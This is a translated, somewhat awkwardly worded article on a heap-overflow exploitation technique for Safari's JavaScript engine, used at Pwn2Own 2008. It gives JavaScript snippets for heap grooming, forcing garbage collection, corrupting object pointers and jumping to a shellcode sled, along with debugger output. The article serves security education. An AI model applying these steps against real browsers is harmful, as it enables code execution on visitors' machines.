Using Heap Overflow with JavaScript

From translator

In this study, the authors reveal an interesting technique for exploiting heap memory overflow. Of course, this vulnerability has long been fixed, but the presented technique itself is very interesting, and the overflow process is described in some detail.
If you are interested in information security and you would like to understand how overflows occur, which continually flash in news bulletins, you will like the study.

Foreword

This article presents a new method of exploiting heap overflow (heap
overflows) in javascript interpreters. In short, to get heap
overflow can use javascript commands to ensure that the function pointer is displayed immediately after a buffer overflow. This educational study uses a technique for Safari, which the authors used to win the CanSecWest 2008 Pwn2Own competition.

Introduction

Many vulnerabilities associated with buffer overruns and integer overflows allow multiple random values to be written at relative offset to the pointer to the heap. Unfortunately for an attacker, often the data following the pointer is unpredictable, which makes exploitation difficult and unreliable. With perfect heap overflows, the attacker gains full control over the number and values of the overflowed bytes, and this is often almost impossible if the rewrite is waiting for anything interesting and predictable.

Due to the protection of the secure release of the metadata structure, heaps are increasingly not an interesting target for overflow. Currently, as an overflow target, data is needed for which the normal execution of a program results in a call to a function pointer that has been overwritten with a pointer to the attacker's code. However, such operations in no way guarantee reliability. For a successful overflow, pointers that are not yet available must be on the heap after an overflowed buffer, and there must be no other critical data or unlabelled memory between them, the destruction of which will lead to premature failure. Such ideal conditions, of course, is a rarity for any application.
')
However, given access to client-side scripting language, such as JavaScript, an attacker could create these ideal conditions for vulnerabilities in applications such as web browsers. In an article (Sotirov, A. Heap Feng Shui in JavaScript. Blackhat Europe 2007), Sotirov describes how to use JavaScript distributions in Internet Explorer to allow an attacker to control the target heap. In this article, we describe a new technique, inspired by his bunch of Feng Shui (Heap Feng Shui), which can be used for reliable positioning.

2 Technique

2.1 Context

In a broad sense, this method can be used to develop client exploits against web browsers that use JavaScript. In this context, the attacker creates a web page containing (among other things) JavaScript commands and prompts the victim to load the page in the browser. Using certain JavaScript commands, an attacker affects the state of the heap in the victim's browser process in order to organize a successful attack.

In the future, we will keep in mind that a buffer that is full is a vulnerable buffer. To achieve heap overflow, the placement and overflow of the vulnerable buffer must be run in a JavaScript interpreter. In particular, this method will not be applied in situations where the vulnerable buffer has already been allocated before the JavaScript interpreter has been created.

We also assume that the shellcode is available, and the mechanism for loading it into memory has already been found. This is trivial with javascript - just load it into a large string.

2.2 Review

Keep in mind that the goal is to manage the heap buffer immediately after the vulnerable buffer. We will achieve this by organizing a heap in which all the holes are large enough to hold the vulnerable buffer, and surrounded by buffers that we manage.

The technique consists of five stages.

1. Heap defragmentation.
2. Creating a hole in the heap.
3. Preparing the blocks around the holes.
4. Isolation and overflow trigger.
5. Starting the transition to shellcode.
These steps are described in more detail in the rest of this section.

2.3 Defragmentation

The state of the process heap depends on the history of the allocation and release of memory that occurred during the life of the process. Therefore, the state of the heap for a long-term multi-threaded process (for example, a web browser) is unpredictable. As a rule, such a heap is fragmented by the fact that there are many free memory holes in it. The presence of holes of different sizes of free memory means that addresses of successive allocations of buffers of the same size are unlikely to have a reliable relationship. Figure 1 shows what a distribution in a fragmented heap might look like:

Figure 1. Fragmented heap.

Since it is impossible to predict where these holes may occur in a heap that has been in use for some time, it is impossible to predict where the following distribution will occur.

However, if we have some control over the target application, we can force the application to make many distributions of any given size. In particular, we can make a lot of distributions, which essentially fill all the holes. Once the holes are filled, that is, the heap is defragmented, the distributions of the same size will, as a rule, predictably close to each other, as in Figure 2:

Figure 2. Defragmented heap. Future allocations are contiguous.

We emphasize that defragmentation always refers to a specific buffer size. In preparation for the exploitation of a vulnerability, we must defrag a heap in relation to the size of the vulnerable buffer. The size of this buffer will be different, but it must be known. As shown in Figure 2, the setting for defragmentation is very simple in javascript.

For example:

var bigdummy = new Array(1000); for(i=0; i<1000; i++){ bigdummy[i] = new Array(size); }

In the above code snippet, each call to new Array (size) results in a distribution of 4 * size + 8 bytes on the heap. This distribution corresponds to an ArrayStorage object consisting of an eight-byte header followed by an array of size pointers. Initially, all distributions are reset. The size value should be chosen so that the resulting distributions are as close as possible to size and not less than the size of the vulnerable buffer. The value 1000, above, was determined empirically.

2.4 Make holes

Remember that our goal is to achieve control over the buffer that follows the vulnerable buffer. Assuming that the defragmentation worked, we should have several contiguous buffers at the end of the heap, about the same size as the vulnerable buffer (not yet allocated) (Fig. 3):

Figure 3. Defragmented heap with multiple distributions. We see a long string of buffers of the same size that we control.

The next step is to free up all the rest of these adjacent buffers, leaving alternating buffers and holes that correspond to the size of the vulnerable buffer.

The first step in achieving this is the following code:

 for (i=900; i<1000; i+=2){ delete(bigdummy[i]); }

The lower limit in the for loop is based on the assumption that after 900 distributions at the defragmentation stage, we reached a point where all subsequent distributions occur contiguously at the end of the heap.

Unfortunately, at this stage we have a problem. Simply deleting an object in JavaScript does not immediately cause the object space in the heap to be freed. The space in the heap is not cleared until the garbage collection takes place. Internet Explorer provides the CollectGarbage () method, which immediately starts garbage collection, but other browser implementations do not. In particular, WebKit does not. Therefore, we will be distracted by discussions on garbage collection in WebKit.

Our verification of the WebKit source code showed that there are three main events that can trigger garbage collection. To understand these events, you need to be familiar with how JavaScript code in WebKit manages objects.

The implementation supports two structures: primaryHeap and numberHeap, each of which is an array of pointers to CollectorBlock objects. CollectorBlock is an array of cells of fixed sizes, and each cell can contain an JSCell object (or a derivative). Each JavaScript object occupies a cell in one of these heaps. Large objects (such as arrays and strings) occupy additional memory in the system heap. We refer to this additional system memory as associated storage.

Each CollectorBlock maintains a linked list of free cells. When a selection is requested and there are no free cells in any existing CollectorBlocks, a new CollectorBlock is allocated.

All JavaScript objects derived from JSObject are allocated in the primaryHeap. numberHeap is reserved for NumberImp objects. Note that the latter do not correspond to JavaScript Number objects, but, as a rule, are short-circuit objects corresponding to intermediate arithmetic calculations.

When garbage collection starts, both heaps are checked for objects with zero references, and such objects (and their associated storage, if any) are released.

Now we return to the three found events that trigger garbage collection:

1. The expiration of the selected timer garbage collection.
2. A request for a distribution that occurs when all the individual CollectorBlocks heaps are filled.
3. Selection of an object with a sufficiently large associated storage (or several such objects).

The first of these events is not very useful, because JavaScript does not have a waiting mode, and any noticeable delay in the script may lead to the “Slow Script” dialog box.

The last of these events depends on the number of objects in the primaryHeap and the size of their associated storage. Experiments show that the state of primaryHeap varies greatly depending on the number of open web pages in the browser and the extent to which these pages use JavaScript. Therefore, reliably starting garbage collection with this event is difficult.

On the other hand, numberHeap appears to be relatively insensitive to these changes. Studies show that numberHeap supports only one selected CollectorBlock, even with a significant browsing page with JavaScript. Because numberHeap CollectorBlock has 4062 Cells, the JavaScript code that creates a lot of NumberImps (performs many arithmetic operations with intermediate calculations) must trigger garbage collection. As an example, manipulating double precision numbers (doubles) is an operation that assigns a NumberImp from a numberHeap, so the following JavaScript code can be used to start garbage collection:

 for (i=0; i<4100; i++) { a = .5; }

After completing this code, the heap should look like Figure 4, and we are ready for the next step:

Figure 4. Managed heap with all freed buffers. Allocation of a vulnerable buffer ends in one of the holes.

2.5 Preparing the blocks.

This step is simple. We use the following javascript:

 for (i=901; i<1000; i+=2) { bigdummy[i][0] = new Number(i); }

The bigdummy [i] [0] = new Number (i) code creates a new NumberInstance object and stores a pointer to this object in an ArrayStorage object corresponding to bigdummy [i]. Figure 5 shows a portion of the heap after starting JavaScript:

Figure 5. Details of the block that controls the attacker, immediately before the overflow starts.

2.6. Run redistribution and overflow.

Now it's time to allocate a vulnerable buffer. If the previous steps have passed, as expected, the allocation for the vulnerable buffer will be in one of the holes we created, and we are ready to overflow. The overflow object is the rewriting of the pNI pointer in the ArrayStorage object that follows the vulnerable buffer. The new value must be an address in sled for shellcode. Details about sled will be discussed below, but for now, note that the typical sled NOP (https://en.wikipedia.org/wiki/NOP_slide) is not appropriate here. After selection and overflow, the heap should look like Figure 6:

Figure 6. Information about the block controlled by the attacker immediately after the start of the overflow.

2.7 Starting the transition to shellcode

The transition to the shellcode is performed by simply interacting with the Number objects created during the preparation of the blocks above. More specifically, we need to force a virtual method of the base NumberInstance object in the JavaScript implementation. For blocks that have not been overwritten, execution is transferred to * ((* pNI) + 4 * k), where k is the method index in the virtual function table that is called. For the block that immediately follows the vulnerable buffer, execution is transferred to * ((* pSled) + 4 * k). This pSled dual dereference is a bit annoying, but the case study below shows a simple way to deal with it.

The following JavaScript calls the virtual function for each NumberInstance object and thereby starts execution of shellcode.

 for (i=901; i<1000; i+=2) { document.write(bigdummy[i][0] + "<br />"); }

3. A practical example

Our research into robust JavaScript has been motivated by a vulnerability that we found in the WebKit Perl-Compatible Regular Expression PCRE analysis. It was an integer overflow that allowed arbitrary overflow size behind the buffer containing the compiled regular expression, which can be of any size up to 65535 bytes. However, the overflow occurred very soon after the buffer was allocated, so we often encountered unallocated memory during the overflow. In other cases, we copied important data, but it seemed completely unpredictable what data was changed there between runs. The equipment described in section 2 solved these problems for us and allowed us to ensure reliable operation.

At first we had to defrag a heap for a target size of about 4,000 bytes. The following debugger output shows how to use the first few distributions to defrag the heap (note the jump around the distribution addresses):

Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance () array buffer at$1 = 0x16278c78
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance () array buffer at$2 = 0x50d000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance () array buffer at$3 = 0x510000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance () array buffer at$4 = 0x16155000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance () array buffer at$5 = 0x1647b000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance () array buffer at$6 = 0x1650f000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance () array buffer at$7 = 0x5ac000

By the time we’ve completed nearly 1000 distributions, the heap is starting to look quite predictable, and all distributions are eventually contiguous.

Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance () array buffer at$997 = 0x17164000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance () array buffer at$998 = 0x17165000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance () array buffer at$999 = 0x17166000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance () array buffer at$1000 = 0x17167000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance () array buffer at$1001 = 0x17168000
Breakpoint 3, 0x95850389 in KJS::ArrayInstance::ArrayInstance () array buffer at$1002 = 0x17169000

By freeing a bunch of holes at the end, using the garbage collection technique described in Section 2.4, we see that the vulnerable buffer lands in the last hole at 0x17168000, just before the data that we control at 0x17169000.

Breakpoint 2, 0x95846748 in jsRegExpCompile () regex buffer at$1004 = 0x17168000

Therefore, we will overflow our regular expression buffer into the ArrayStorage data. Overflow bytes must be compiled into a regular expression byte. Fortunately, the regular expression character class construction allows for virtually arbitrary bytes in compiled form, since it compiles into 33 bytes, the last 32 of which make up an array with a 256-bit bit, where the bit set to one means that this character is in . Thus, we use the character class [\ x00 \ x59 \ x5c \ x5e] and arrange them at the beginning of the ArrayStorage data, since the first 3 words of its compiled bit class are a non-zero dword, zero dword, and an address in our heap, namely:

0x00000001 0x00000000 0x52000000

Finally, we use a specially crafted address in the heap, using the big string dword 0x52780278, followed by the shellcode. We arrange distribution of spraying so that this address is within the scope of what we need Then, when it is interpreted as an instruction after the start of execution, it becomes conditional transitions:

 78 02: js +0x2 78 52: js +0x52

which are an effective NOP regardless of the value of the transition condition: if the condition is true, a jump from two is taken to the beginning of the next command, and if the condition is false, this is also not true for the jump 0x52. This means the most significant byte when the definition of the heap spray address is not fully used in sled, and is also aligned by 4 bytes.

4. Conclusions

The technique described in this article allowed us to ensure reliable operation of the buffer overflow, which initially did not have predictable and interesting data for rewriting. As long as the attacker needs some control over the system, such as distribution size, overflow size, and overflow data, this method should be applied to other browser vulnerabilities when the attacker has access to JavaScript. We suspect that such methods may be applicable when working with other client scripting languages.

Source: https://habr.com/ru/post/342458/

All Articles